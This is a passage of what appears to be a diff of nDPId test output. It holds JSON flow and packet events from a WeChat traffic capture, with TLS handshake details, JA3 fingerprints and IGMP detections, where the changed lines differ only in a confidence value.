{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":389,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167401063,"flow_last_seen":1492167402665,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"thread_ts_msec":1492167402665,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":391,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167401063,"flow_last_seen":1492167402666,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1492167402666,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1492167422952,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167422952,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0KNBAAEAGqhvAqAFn2DrNjsJ7AbvMOVSD1yvysIAQAT2SvQAAAQEICgAw\/kAycps2"} 00541{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":474,"source":"wechat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167440370,"flow_last_seen":1492167440370,"flow_idle_time":620000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1492167440370,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 
00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"wechat.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1492167440370,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":50,"pkt_l4_len":12,"thread_ts_msec":1492167440370,"pkt":"AQBeAAAB8IQvSpdgCABGoAAkj9gAAAEC8bPAqAH+4AAAAZQEAAARZOybAAAAAAIAAAA="} -00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":474,"source":"wechat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167440370,"flow_last_seen":1492167440370,"flow_idle_time":620000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1492167440370,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":474,"source":"wechat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167440370,"flow_last_seen":1492167440370,"flow_idle_time":620000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1492167440370,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 
00542{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":475,"source":"wechat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167440984,"flow_last_seen":1492167440984,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492167440984,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":475,"source":"wechat.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1492167440984,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1492167440984,"pkt":"AQBeAAAW0CeIF3AECABGoAAoPPkAAAECRRTAqAFk4AAAFpQEAAAiAOwAAAAAAQIAAADv\/\/\/9"} -00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":475,"source":"wechat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167440984,"flow_last_seen":1492167440984,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492167440984,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 
+00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":475,"source":"wechat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167440984,"flow_last_seen":1492167440984,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492167440984,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":478,"source":"wechat.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1492167443647,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1492167443647,"pkt":"AQBeAAAW0CeIF3AECABGoAAoPPoAAAECRRPAqAFk4AAAFpQEAAAiAPsBAAAAAQIAAADgAAD8"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":479,"source":"wechat.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1492167444467,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1492167444467,"pkt":"AQBeAAAW0CeIF3AECABGoAAoPPwAAAECRRHAqAFk4AAAFpQEAAAiAPsCAAAAAQIAAADgAAD7"} 
00542{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":488,"source":"wechat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167449288,"flow_last_seen":1492167449288,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492167449288,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"wechat.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1492167449288,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1492167449288,"pkt":"AQBeAAAWeJKcD6iOCABGwAAoAABAAAECQerAqAFn4AAAFpQEAAAiAPsCAAAAAQIAAADgAAD7"} -00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":488,"source":"wechat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167449288,"flow_last_seen":1492167449288,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492167449288,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 
+00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":488,"source":"wechat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167449288,"flow_last_seen":1492167449288,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492167449288,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":491,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167452759,"flow_last_seen":1492167452759,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167452759,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1492167452759,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167452759,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8XuFAAEAGtlvAqAFny82XotNTAbtWrkW6AAAAAKACchAjbQAAAgQFtAQCCAoAMRtbAAAAAAEDAwc="} 
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":493,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167453010,"flow_last_seen":1492167453010,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167453010,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":493,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1492167453010,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167453010,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8DstAAEAGBnLAqAFny82XotNUAbuiFhVRAAAAAKACchAILgAAAgQFtAQCCAoAMRuaAAAAAAEDAwc="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":494,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1492167453125,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167453125,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG701NWIPBqVq5Fu6ASN8jLwAAAAgQFoAQCCApF0gWaADEbWwEDAwc="} 
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":495,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1492167453125,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167453125,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0XuJAAEAGtmLAqAFny82XotNTAbtWrkW7ViDwa4AQAOUxAAAAAQEICgAxG7dF0gWa"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":496,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167452759,"flow_last_seen":1492167453126,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167453126,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":496,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167452759,"flow_last_seen":1492167453126,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167453126,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1492167453357,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167453357,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC4GJp3LzZeiwKgBZwG701Rfi5PhohYVUqASN8gDZQAAAgQFoAQCCApF0gXVADEbmgEDAwc="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1492167453357,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167453357,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0DsxAAEAGBnnAqAFny82XotNUAbuiFhVSX4uT4oAQAOVoqQAAAQEICgAxG\/FF0gXV"} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":500,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167452759,"flow_last_seen":1492167453494,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167453494,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":502,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167452759,"flow_last_seen":1492167453503,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167453503,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 
-00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":513,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167453010,"flow_last_seen":1492167454373,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167454373,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":500,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167452759,"flow_last_seen":1492167453494,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167453494,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
+01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":502,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167452759,"flow_last_seen":1492167453503,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167453503,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 
+00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":513,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167453010,"flow_last_seen":1492167454373,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167454373,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":515,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167454457,"flow_last_seen":1492167454457,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167454457,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1492167454457,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167454457,"pkt":"8IQvSpdgeJKcD6iOCABFAAA86XpAAEAGK8LAqAFny82XotNVAbue7PR+AAAAAKACchAqvwAAAgQFtAQCCAoAMR0EAAAAAAEDAwc="} 
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":516,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167454458,"flow_last_seen":1492167454458,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167454458,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":516,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1492167454458,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167454458,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8cSZAAEAGpBbAqAFny82XotNWAbsdO2wiAAAAAKACchA0zAAAAgQFtAQCCAoAMR0EAAAAAAEDAwc="} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":521,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167453010,"flow_last_seen":1492167454734,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"thread_ts_msec":1492167454734,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
